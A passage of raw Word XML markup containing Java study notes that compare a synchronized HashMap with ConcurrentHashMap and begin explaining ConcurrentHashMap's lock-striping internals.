          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> All operations (read and write) are synchronized, leading to performance degradation under heavy multi-threading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440E0271"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ot Suitable for High Concurrency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00741CCB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> For applications with high concurrent read/write operations, use </w:t>
      </w:r>
      <w:r w:rsidRPr="00741CCB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00741CCB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6880715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pict w14:anchorId="6449BD3C">
          <v:rect id="_x0000_i6539" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="228994C4"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7. SynchronizedHashMap vs.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gridCol w:w="3647"/>
        <w:gridCol w:w="4705"/>
      </w:tblGrid>
      <w:tr w:rsidR="00741CCB" w:rsidRPr="00741CCB" w14:paraId="29F369FA" w14:textId="77777777" w:rsidTr="00741CCB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="131CDB7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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="551C9A9B"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SynchronizedHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45640A7E"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ConcurrentHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00741CCB" w:rsidRPr="00741CCB" w14:paraId="4A7E7693" w14:textId="77777777" w:rsidTr="00741CCB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A356C5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Thread Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E8B361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but synchronized on the entire map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DA76945"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Yes, with fine-grained (bucket-level) locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00741CCB" w:rsidRPr="00741CCB" w14:paraId="0449A5EF" w14:textId="77777777" w:rsidTr="00741CCB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7097BEA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Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0879803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lower due to global locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38392B94"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Faster, as it allows concurrent read and partial write</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00741CCB" w:rsidRPr="00741CCB" w14:paraId="2FB61DEC" w14:textId="77777777" w:rsidTr="00741CCB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="186F7B2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Null Keys/Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07D4129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Allows null keys and values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DD8C2C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Does not allow null keys or values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00741CCB" w:rsidRPr="00741CCB" w14:paraId="212C9FE0" w14:textId="77777777" w:rsidTr="00741CCB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78A6AC7D"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Read-Write Locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D343BB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Entire map locked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47E46CB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egment-level locking, allows concurrent reads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00741CCB" w:rsidRPr="00741CCB" w14:paraId="05EED4F7" w14:textId="77777777" w:rsidTr="00741CCB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47FE089A"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teration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="779CC69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ust synchronize externally</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="547ACBF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No external synchronization required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="366CB73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pict w14:anchorId="7BED91CB">
          <v:rect id="_x0000_i6540" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BE58C9"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8. Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3860BE48"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Moderate concurrency where occasional writes and reads are performed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7270B0E3"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cenarios where data consistency is more important than performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683EE16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egacy systems where upgrading to ConcurrentHashMap might be challenging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5A572E"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pict w14:anchorId="63FF0145">
          <v:rect id="_x0000_i6541" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CF57FA"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9. Drawbacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486EEA9C"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Performance Bottleneck:</w:t>
      </w:r>
      <w:r w:rsidRPr="00741CCB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Global lock can degrade performance in multi-threaded environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622B45E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Manual Synchronization for Iteration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00741CCB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Must use synchronized blocks while iterating, which can lead to errors if forgotten.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31248F1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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Inefficient in High Concurrency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00741CCB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Consider ConcurrentHashMap when frequent concurrent access is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62927B0F"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pict w14:anchorId="48E09CE4">
          <v:rect id="_x0000_i6542" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2887EB82"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10. When to Use SynchronizedHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016293C7"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Low to moderate concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCBD996"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en data consistency is critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50673459"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Suitable when you need null key/value support in a multi-threaded environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22500C02"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en you don’t want to refactor existing HashMap usage to ConcurrentHashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E95BC0"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pict w14:anchorId="6BEFB516">
          <v:rect id="_x0000_i6543" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A71C956" w14:textId="77777777" w:rsidR="00741CCB" w:rsidRPr="00741CCB" w:rsidRDefault="00741CCB" w:rsidP="00741CCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00741CCB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A45DA5B" w14:textId="77777777" w:rsidR="00741CCB" w:rsidRPr="00741CCB" w:rsidRDefault="00741CCB" w:rsidP="00741CCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00741CCB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>While SynchronizedHashMap ensures thread safety by synchronizing all map operations, it can become a performance bottleneck due to global locking. For applications with high concurrency, prefer ConcurrentHashMap, which provides better throughput with fine-grained locking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208FFB7B" w14:textId="77777777" w:rsidR="00541996" w:rsidRDefault="00541996" w:rsidP="005419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01B46F4">
          <v:rect id="_x0000_i3925" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="526C784B" w14:textId="226F268A" w:rsidR="00541996" w:rsidRPr="00CE4B95" w:rsidRDefault="000263C2" w:rsidP="00541996">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="181" w:name="_Toc197867395"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain </w:t>
      </w:r>
      <w:r w:rsidRPr="000263C2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidR="00541996" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="181"/>
    </w:p>
    <w:p w14:paraId="453950A3" w14:textId="4CE92BBB" w:rsidR="004C3969" w:rsidRPr="004C3969" w:rsidRDefault="004C3969" w:rsidP="00882016">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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ConcurrentHashMap is a thread-safe version of HashMap introduced in </w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 1.5</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.util.concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package and is designed for high-concurrency scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D7489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4BA7B08E">
          <v:rect id="_x0000_i6633" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5808BEB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gridCol w:w="6301"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="0FA6A4EA" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="628967F7" w14:textId="77777777" w:rsidR="004C3969" w:rsidRPr="004C3969" w:rsidRDefault="004C3969" w:rsidP="00F0500A">
            <w:pPr>
              <w:jc w:val="center"/>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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C6667BD" w14:textId="77777777" w:rsidR="004C3969" w:rsidRPr="004C3969" w:rsidRDefault="004C3969" w:rsidP="00F0500A">
            <w:pPr>
              <w:jc w:val="center"/>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urrentHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="77A64564" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="071164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 Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41370AC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Yes (fine-grained locking with segment-based concurrency)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="5337EF22" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40C1154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ull Keys/Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A58FEE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t allowed</w:t>
            </w:r>
            <w:r w:rsidRPr="004C3969">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (throws NullPointerException)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="7EDBF602" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23DDD7E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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10B15A2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High, due to </w:t>
            </w:r>
            <w:r w:rsidRPr="004C3969">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>lock striping</w:t>
            </w:r>
            <w:r w:rsidRPr="004C3969">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (partial locking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="1AAC95B9" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5779B03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d-Write Locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="726B551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ses </w:t>
            </w:r>
            <w:r w:rsidRPr="004C3969">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>lock-free reads</w:t>
            </w:r>
            <w:r w:rsidRPr="004C3969">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r w:rsidRPr="004C3969">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>segment-based writes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="4C750C37" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69F8949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cy Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0068B85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Default is </w:t>
            </w:r>
            <w:r w:rsidRPr="004C3969">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidRPr="004C3969">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (can be configured)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="435D9694" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41628A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ion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C6ED7E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Weakly consistent</w:t>
            </w:r>
            <w:r w:rsidRPr="004C3969">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, does not throw ConcurrentModificationException</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="786687B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7B2D1458">
          <v:rect id="_x0000_i6634" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1070D95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2. Internal Working:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544F77A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ses a concept called </w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lock striping</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which divides the map into </w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>segments</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AE750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ach segment can be locked independently, allowing multiple threads to read and write concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACD215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Bucket-Level Locking:</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
